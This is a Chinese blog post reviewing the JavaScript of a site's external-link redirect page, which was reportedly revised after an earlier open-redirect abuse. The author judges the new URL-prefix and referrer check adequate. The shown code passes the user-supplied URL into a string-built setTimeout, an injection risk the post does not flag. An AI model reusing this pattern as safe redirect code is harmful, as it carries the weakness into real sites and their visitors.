如有乐享之前的跳转已经看不到了,现在的说是解决了上一个漏洞问题,看下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>如有乐享 - 外链跳转</title>
<meta name="Author" content="">
<meta name="Keywords" content="如有乐享,外链跳转">
<meta name="Description" content="如有乐享跳转外链网址专用页面">
</head>

<body>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 首页广告 -->
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2073396170871664" data-ad-slot="9635575110"
data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<a href="https://51.RUYO.net">返回首页</a><b><a id='atag' href="https://51.RUYO.net">点击这里跳转</a></b>,页面将在20秒后跳转......
<script src="//cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
<script src="//cdn.bootcss.com/Base64/1.0.1/base64.min.js"></script>
<script>
(function ($) {
$.getUrlParam = function (name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return decodeURI(decodeURI(r[2])); return null;
}
})(jQuery);
var u = $.getUrlParam("u") || atob($.getUrlParam("d")) || "https://51.ruyo.net";
if (u.toUpperCase().indexOf("HTTP") == 0 && document.referrer.toUpperCase().indexOf("//51.RUYO.NET") > 0) {
document.getElementById("atag").href=u;
setTimeout("javascript:location.href='" + u + "'", 20000);
} else {
location.href = "https://51.ruyo.net";
}
</script>
<script>
var _hmt = _hmt || [];
(function () {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?0bd90052898d11e61495657b34d773e3";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
</body>

</html>

核心代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
(function ($) {
//获取url参数
$.getUrlParam = function (name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return decodeURI(decodeURI(r[2])); return null;
}
})(jQuery);
/**
* u = 要跳转的地址
* d = 经过Base64编码后的地址
*/
var u = $.getUrlParam("u") || atob($.getUrlParam("d")) || "https://51.ruyo.net";
//toUpperCase() 方法用于把字符串转换为大写。
//indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。如果没有找到匹配的字符串则返回 -1。注意: indexOf() 方法区分大小写。
//要跳转的链接,HTTP 必须是头部 0开始
//document.referrer 属性返回载入当前文档的来源文档的URL
if (u.toUpperCase().indexOf("HTTP") == 0 && document.referrer.toUpperCase().indexOf("//51.RUYO.NET") > 0) {
document.getElementById("atag").href=u;
setTimeout("javascript:location.href='" + u + "'", 20000);
} else {
location.href = "https://51.ruyo.net";
}

​ 之前的代码看不到,但就目前的代码来说可以吧,但是局限性也是有的,例如只能跳转http或者https的链接其他的不可以,也满足正常的用法。对比了下我目前所用的《HEXO下js实现外链跳转html-php页面效果代码》,支持各种下载链接等,虽说强大但也未必是件好事。各有千秋吧。

总结

​ 一开始看到的时候还是挺害怕的,毕竟自己也有相同功能的跳转页面,虽说启用前先做了下简单的测试,但还是有点心虚,毕竟人上有人,更何况这些黑产人员的经验远比我这搬砖小白高。正所谓功夫再高也怕菜刀。

​ 一个简简单单的跳转页面都能扯出这么多的东西来,网络安全不可忽视。

​ js的很多函数虽说认识但是解释起来怕说不清楚,也怕误导了看文章的人。所以都是引用菜鸟教程的原话,具有一定的参考价值。自己也重新认识了下。

参考